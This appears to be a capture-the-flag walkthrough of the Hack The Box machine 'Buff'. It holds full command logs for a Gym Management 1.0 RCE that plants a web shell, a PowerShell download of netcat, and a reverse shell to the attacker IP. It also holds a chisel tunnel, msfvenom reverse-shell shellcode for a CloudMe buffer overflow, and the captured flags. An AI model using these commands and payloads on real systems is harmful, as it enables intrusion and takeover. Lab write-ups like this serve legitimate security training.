HTB Buff done
Buff
OS:
Windows
Technology:
Gym Management Software 1.0
IP Address:
10.129.212.178
Open ports:
7680/tcp open pando-pub?
8080/tcp open http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
Users and pass:
Nmap
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Buff]
└─$ sudo nmap -A -sV --script=default -p- -oA 10.129.212.178_nmap 10.129.212.178 ; cat 10.129.212.178_nmap.nmap | grep -E "^[0-9]{1,}/(tcp|udp)"
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-19 13:02 UTC
Nmap scan report for 10.129.212.178
Host is up (0.11s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
7680/tcp open pando-pub?
8080/tcp open http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
|_http-title: mrb3n's Bro Hut
Ffuz: http://10.129.212.178:8080
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Buff]
└─$ ffuf -u http://10.129.212.178:8080/FUZZ -c -w /usr/share/wordlists/dirb/big.txt -ac -o 10.129.212.178_8080_ffuz -of all -e .php,.html,.txt,.bac,.backup,.md
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://10.129.212.178:8080/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/big.txt
:: Extensions : .php .html .txt .bac .backup .md
:: Output file : 10.129.212.178_8080_ffuz.{json,ejson,html,md,csv,ecsv}
:: File format : all
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
About.php [Status: 200, Size: 5337, Words: 999, Lines: 142, Duration: 1937ms]
Contact.php [Status: 200, Size: 4169, Words: 798, Lines: 119, Duration: 1804ms]
Home.php [Status: 200, Size: 143, Words: 18, Lines: 3, Duration: 364ms]
LICENSE [Status: 200, Size: 18025, Words: 3098, Lines: 339, Duration: 102ms]
Index.php [Status: 200, Size: 4969, Words: 935, Lines: 134, Duration: 1722ms]
README.md [Status: 200, Size: 309, Words: 32, Lines: 17, Duration: 34ms]
Readme.md [Status: 200, Size: 309, Words: 32, Lines: 17, Duration: 293ms]
about.php [Status: 200, Size: 5337, Words: 999, Lines: 142, Duration: 1174ms]
att [Status: 301, Size: 345, Words: 22, Lines: 10, Duration: 273ms]
att.php [Status: 200, Size: 816, Words: 111, Lines: 28, Duration: 1379ms]
boot [Status: 301, Size: 346, Words: 22, Lines: 10, Duration: 268ms]
cgi-bin/ [Status: 403, Size: 1060, Words: 103, Lines: 43, Duration: 382ms]
contact.php [Status: 200, Size: 4169, Words: 798, Lines: 119, Duration: 1247ms]
edit.php [Status: 200, Size: 4282, Words: 844, Lines: 122, Duration: 1920ms]
ex [Status: 301, Size: 344, Words: 22, Lines: 10, Duration: 32ms]
facilities.php [Status: 200, Size: 5961, Words: 1011, Lines: 123, Duration: 1697ms]
feedback.php [Status: 200, Size: 4252, Words: 760, Lines: 114, Duration: 1247ms]
home.php [Status: 200, Size: 143, Words: 18, Lines: 3, Duration: 379ms]
img [Status: 301, Size: 345, Words: 22, Lines: 10, Duration: 46ms]
include [Status: 301, Size: 349, Words: 22, Lines: 10, Duration: 380ms]
index.php [Status: 200, Size: 4969, Words: 935, Lines: 134, Duration: 1488ms]
license [Status: 200, Size: 18025, Words: 3098, Lines: 339, Duration: 233ms]
licenses [Status: 403, Size: 1205, Words: 127, Lines: 46, Duration: 369ms]
packages.php [Status: 200, Size: 7791, Words: 2315, Lines: 169, Duration: 2312ms]
phpmyadmin [Status: 403, Size: 1205, Words: 127, Lines: 46, Duration: 309ms]
profile [Status: 301, Size: 349, Words: 22, Lines: 10, Duration: 312ms]
readme.md [Status: 200, Size: 309, Words: 32, Lines: 17, Duration: 31ms]
register.php [Status: 200, Size: 137, Words: 23, Lines: 4, Duration: 2003ms]
server-info [Status: 403, Size: 1205, Words: 127, Lines: 46, Duration: 297ms]
server-status [Status: 403, Size: 1205, Words: 127, Lines: 46, Duration: 50ms]
up.php [Status: 200, Size: 209, Words: 23, Lines: 5, Duration: 871ms]
upload [Status: 301, Size: 348, Words: 22, Lines: 10, Duration: 446ms]
upload.php [Status: 200, Size: 107, Words: 12, Lines: 3, Duration: 1837ms]
workouts [Status: 301, Size: 350, Words: 22, Lines: 10, Duration: 273ms]
:: Progress: [143283/143283] :: Job [1/1] :: 161 req/sec :: Duration: [0:17:34] :: Errors: 0 ::
Find version of software: Gym Management Software 1.0
http://10.129.212.178:8080/contact.php
Gym Management Software 1.0
Exploit: Gym Management 1.0 unauthenticated RCE
[Gym Management 1.0 unauthenticated RCE](https://github.com/0xConstant/Gym-Management-1.0-unauthenticated-RCE)
Download exploit
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Buff]
└─$ git clone https://github.com/0xConstant/Gym-Management-1.0-unauthenticated-RCE.git
Cloning into 'Gym-Management-1.0-unauthenticated-RCE'...
remote: Enumerating objects: 12, done.
remote: Counting objects: 100% (12/12), done.
remote: Compressing objects: 100% (9/9), done.
remote: Total 12 (delta 1), reused 0 (delta 0), pack-reused 0 (from 0)
Receiving objects: 100% (12/12), 5.77 KiB | 1.44 MiB/s, done.
Resolving deltas: 100% (1/1), done.
Run exploit
┌──(kali㉿kali)-[~/…/writeups/HTB/HTB_Buff/Gym-Management-1.0-unauthenticated-RCE]
└─$ python3 exploit.py http://10.129.212.178:8080
Shell has been uploaded: http://10.129.212.178:8080/upload/AixPvnDIFw.php
Create a stable revshell (netcat)
┌──(kali㉿kali)-[~/…/writeups/HTB/HTB_Buff/Gym-Management-1.0-unauthenticated-RCE]
└─$ python3 exploit.py http://10.129.212.178:8080
Shell has been uploaded: http://10.129.212.178:8080/upload/AixPvnDIFw.php
----------------------------------------------------------------------
Shell> powershell Invoke-WebRequest -Uri http://10.10.14.127/nc64.exe -Outfile nc.exe
Shell> nc.exe 10.10.14.127 81 -e cmd.exe
---
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Buff]
└─$ netcat -lvnp 81
listening on [any] 81 ...
connect to [10.10.14.127] from (UNKNOWN) [10.129.212.178] 49902
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\xampp\htdocs\gym\upload>
C:\xampp\htdocs\gym\upload>whoami
whoami
buff\shaun
Read flag: user.txt
C:\xampp\htdocs\gym\upload>cd C:
cd C:
C:\xampp\htdocs\gym\upload
C:\xampp\htdocs\gym\upload>cd C:\Users\shaun\Desktop
cd C:\Users\shaun\Desktop
C:\Users\shaun\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is A22D-49F7
Directory of C:\Users\shaun\Desktop
14/07/2020 12:27 <DIR> .
14/07/2020 12:27 <DIR> ..
19/11/2024 11:55 34 user.txt
1 File(s) 34 bytes
2 Dir(s) 9,234,538,496 bytes free
C:\Users\shaun\Desktop>whoami /all
whoami /all
USER INFORMATION
----------------
User Name SID
========== ==============================================
buff\shaun S-1-5-21-2277156429-3381729605-2640630771-1001
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
====================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\BATCH Well-known group S-1-5-3 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ==================================== ========
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
C:\Users\shaun\Desktop>ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . : .htb
IPv6 Address. . . . . . . . . . . : dead:beef::7c23:b5b0:ad9e:4b3c
Temporary IPv6 Address. . . . . . : dead:beef::d5aa:8bd3:c4cf:3a1c
Link-local IPv6 Address . . . . . : fe80::7c23:b5b0:ad9e:4b3c%10
IPv4 Address. . . . . . . . . . . : 10.129.212.178
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:7437%10
10.129.0.1
C:\Users\shaun\Desktop>type user.txt
type user.txt
b29e3dc1b4eaaa0ad93ce2f4537ea59d
C:\Users\shaun\Desktop>
Privilege Escalation
Find software: CloudMe_1112.exe
C:\Users\shaun>cd Downloads
cd Downloads
C:\Users\shaun\Downloads>dir
dir
Volume in drive C has no label.
Volume Serial Number is A22D-49F7
Directory of C:\Users\shaun\Downloads
14/07/2020 12:27 <DIR> .
14/07/2020 12:27 <DIR> ..
16/06/2020 15:26 17,830,824 CloudMe_1112.exe
1 File(s) 17,830,824 bytes
2 Dir(s) 9,676,242,944 bytes free
Find running software: CloudMe
C:\Users\shaun\Downloads>netstat -ano | findstr 8888 & tasklist | findstr CloudMe.exe
netstat -ano | findstr 8888 & tasklist | findstr CloudMe.exe
TCP 127.0.0.1:8888 0.0.0.0:0 LISTENING 2244
CloudMe.exe 2244 0 37,252 K
C:\Users\shaun\Downloads>
Exploit: CloudMe 1.11.2 - Buffer Overflow (PoC)
[CloudMe 1.11.2 - Buffer Overflow (PoC)]( https://www.exploit-db.com/exploits/48389)
Download exploit
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Buff]
└─$ wget https://www.exploit-db.com/download/48389
--2024-11-20 08:40:39-- https://www.exploit-db.com/download/48389
Resolving www.exploit-db.com (www.exploit-db.com)... 192.124.249.13
Connecting to www.exploit-db.com (www.exploit-db.com)|192.124.249.13|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2043 (2.0K) [application/txt]
Saving to: ‘48389’
48389 100%[==============================================>] 2.00K --.-KB/s in 0s
2024-11-20 08:40:40 (81.2 MB/s) - ‘48389’ saved [2043/2043]
Create tunnel via chisel
C:\Users\shaun\Desktop>chisel.exe client 10.10.14.127:9000 R:8888:localhost:8888
chisel.exe client 10.10.14.127:9000 R:8888:localhost:8888
2024/11/20 08:33:35 client: Connecting to ws://10.10.14.127:9000
2024/11/20 08:33:35 client: Connected (Latency 33.3692ms)
---
┌──(kali㉿kali)-[~/…/writeups/HTB/HTB_Buff/Gym-Management-1.0-unauthenticated-RCE]
└─$ chisel server -p 9000 --reverse
2024/11/20 08:32:45 server: Reverse tunnelling enabled
2024/11/20 08:32:45 server: Fingerprint S9WeSOGS/KQvo+88z7sU/icOK7lMdpBOEf3IkawvKFg=
2024/11/20 08:32:45 server: Listening on http://0.0.0.0:9000
2024/11/20 08:33:03 server: session#1: Client version (1.10.1) differs from server version (1.10.1-0kali1)
2024/11/20 08:33:03 server: session#1: tun: proxy#R:8888=>localhost:8888: Listening
---
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Buff]
└─$ ss -tulpn | grep "chisel"
tcp LISTEN 0 4096 *:8888 *:* users:(("chisel",pid=6255,fd=7))
tcp LISTEN 0 4096 *:9000 *:* users:(("chisel",pid=6255,fd=5))
Edit exploit
I have to create a revshell payload mfvenom
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Buff]
└─$ msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=10.10.14.127 LPORT=3000 -b '\x00\x0A\x0D' -f python -v payload
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of python file: 1899 bytes
payload = b""
payload += b"\xb8\x2a\xc6\x2f\xe6\xda\xca\xd9\x74\x24\xf4"
payload += b"\x5e\x31\xc9\xb1\x52\x31\x46\x12\x83\xee\xfc"
payload += b"\x03\x6c\xc8\xcd\x13\x8c\x3c\x93\xdc\x6c\xbd"
payload += b"\xf4\x55\x89\x8c\x34\x01\xda\xbf\x84\x41\x8e"
payload += b"\x33\x6e\x07\x3a\xc7\x02\x80\x4d\x60\xa8\xf6"
payload += b"\x60\x71\x81\xcb\xe3\xf1\xd8\x1f\xc3\xc8\x12"
payload += b"\x52\x02\x0c\x4e\x9f\x56\xc5\x04\x32\x46\x62"
payload += b"\x50\x8f\xed\x38\x74\x97\x12\x88\x77\xb6\x85"
payload += b"\x82\x21\x18\x24\x46\x5a\x11\x3e\x8b\x67\xeb"
payload += b"\xb5\x7f\x13\xea\x1f\x4e\xdc\x41\x5e\x7e\x2f"
payload += b"\x9b\xa7\xb9\xd0\xee\xd1\xb9\x6d\xe9\x26\xc3"
payload += b"\xa9\x7c\xbc\x63\x39\x26\x18\x95\xee\xb1\xeb"
payload += b"\x99\x5b\xb5\xb3\xbd\x5a\x1a\xc8\xba\xd7\x9d"
payload += b"\x1e\x4b\xa3\xb9\xba\x17\x77\xa3\x9b\xfd\xd6"
payload += b"\xdc\xfb\x5d\x86\x78\x70\x73\xd3\xf0\xdb\x1c"
payload += b"\x10\x39\xe3\xdc\x3e\x4a\x90\xee\xe1\xe0\x3e"
payload += b"\x43\x69\x2f\xb9\xa4\x40\x97\x55\x5b\x6b\xe8"
payload += b"\x7c\x98\x3f\xb8\x16\x09\x40\x53\xe6\xb6\x95"
payload += b"\xf4\xb6\x18\x46\xb5\x66\xd9\x36\x5d\x6c\xd6"
payload += b"\x69\x7d\x8f\x3c\x02\x14\x6a\xd7\x27\xe3\x7a"
payload += b"\x58\x50\xf1\x82\xad\x18\x7c\x64\xdb\x48\x29"
payload += b"\x3f\x74\xf0\x70\xcb\xe5\xfd\xae\xb6\x26\x75"
payload += b"\x5d\x47\xe8\x7e\x28\x5b\x9d\x8e\x67\x01\x08"
payload += b"\x90\x5d\x2d\xd6\x03\x3a\xad\x91\x3f\x95\xfa"
payload += b"\xf6\x8e\xec\x6e\xeb\xa9\x46\x8c\xf6\x2c\xa0"
payload += b"\x14\x2d\x8d\x2f\x95\xa0\xa9\x0b\x85\x7c\x31"
payload += b"\x10\xf1\xd0\x64\xce\xaf\x96\xde\xa0\x19\x41"
payload += b"\x8c\x6a\xcd\x14\xfe\xac\x8b\x18\x2b\x5b\x73"
payload += b"\xa8\x82\x1a\x8c\x05\x43\xab\xf5\x7b\xf3\x54"
payload += b"\x2c\x38\x03\x1f\x6c\x69\x8c\xc6\xe5\x2b\xd1"
payload += b"\xf8\xd0\x68\xec\x7a\xd0\x10\x0b\x62\x91\x15"
payload += b"\x57\x24\x4a\x64\xc8\xc1\x6c\xdb\xe9\xc3"
---
Copy paste payload (above) to exploit
Run exploit
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Buff]
└─$ python3 48389
---
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Buff]
└─$ netcat -lvnp 3000
listening on [any] 3000 ...
connect to [10.10.14.127] from (UNKNOWN) [10.129.212.178] 50142
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
buff\administrator
Read flag: root.txt
C:\Windows\system32>cd C:\Users\Administrator\Desktop
cd C:\Users\Administrator\Desktop
C:\Users\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is A22D-49F7
Directory of C:\Users\Administrator\Desktop
18/07/2020 16:36 <DIR> .
18/07/2020 16:36 <DIR> ..
16/06/2020 15:41 1,417 Microsoft Edge.lnk
19/11/2024 11:55 34 root.txt
2 File(s) 1,451 bytes
2 Dir(s) 9,675,681,792 bytes free
C:\Users\Administrator\Desktop>whoami /all
whoami /all
USER INFORMATION
----------------
User Name SID
================== =============================================
buff\administrator S-1-5-21-2277156429-3381729605-2640630771-500
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
============================================================= ================ ============ ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account and member of Administrators group Well-known group S-1-5-114 Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators Alias S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\BATCH Well-known group S-1-5-3 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
========================================= ================================================================== ========
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeSecurityPrivilege Manage auditing and security log Disabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Disabled
SeLoadDriverPrivilege Load and unload device drivers Disabled
SeSystemProfilePrivilege Profile system performance Disabled
SeSystemtimePrivilege Change the system time Disabled
SeProfileSingleProcessPrivilege Profile single process Disabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Disabled
SeCreatePagefilePrivilege Create a pagefile Disabled
SeBackupPrivilege Back up files and directories Disabled
SeRestorePrivilege Restore files and directories Disabled
SeShutdownPrivilege Shut down the system Disabled
SeDebugPrivilege Debug programs Disabled
SeSystemEnvironmentPrivilege Modify firmware environment values Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Disabled
SeUndockPrivilege Remove computer from docking station Disabled
SeManageVolumePrivilege Perform volume maintenance tasks Disabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
SeCreateSymbolicLinkPrivilege Create symbolic links Disabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Disabled
ERROR: Unable to get user claims information.
C:\Users\Administrator\Desktop>ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . : .htb
IPv6 Address. . . . . . . . . . . : dead:beef::19c
IPv6 Address. . . . . . . . . . . : dead:beef::7c23:b5b0:ad9e:4b3c
Temporary IPv6 Address. . . . . . : dead:beef::d5aa:8bd3:c4cf:3a1c
Link-local IPv6 Address . . . . . : fe80::7c23:b5b0:ad9e:4b3c%10
IPv4 Address. . . . . . . . . . . : 10.129.212.178
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:7437%10
10.129.0.1
C:\Users\Administrator\Desktop>type root.txt
type root.txt
aaf285f84fd76f45cdb9f073e25da8c0
C:\Users\Administrator\Desktop>
References
[Gym Management 1.0 unauthenticated RCE](https://github.com/0xConstant/Gym-Management-1.0-unauthenticated-RCE)
[CloudMe 1.11.2 - Buffer Overflow (PoC)]( https://www.exploit-db.com/exploits/48389)
Lessons Learned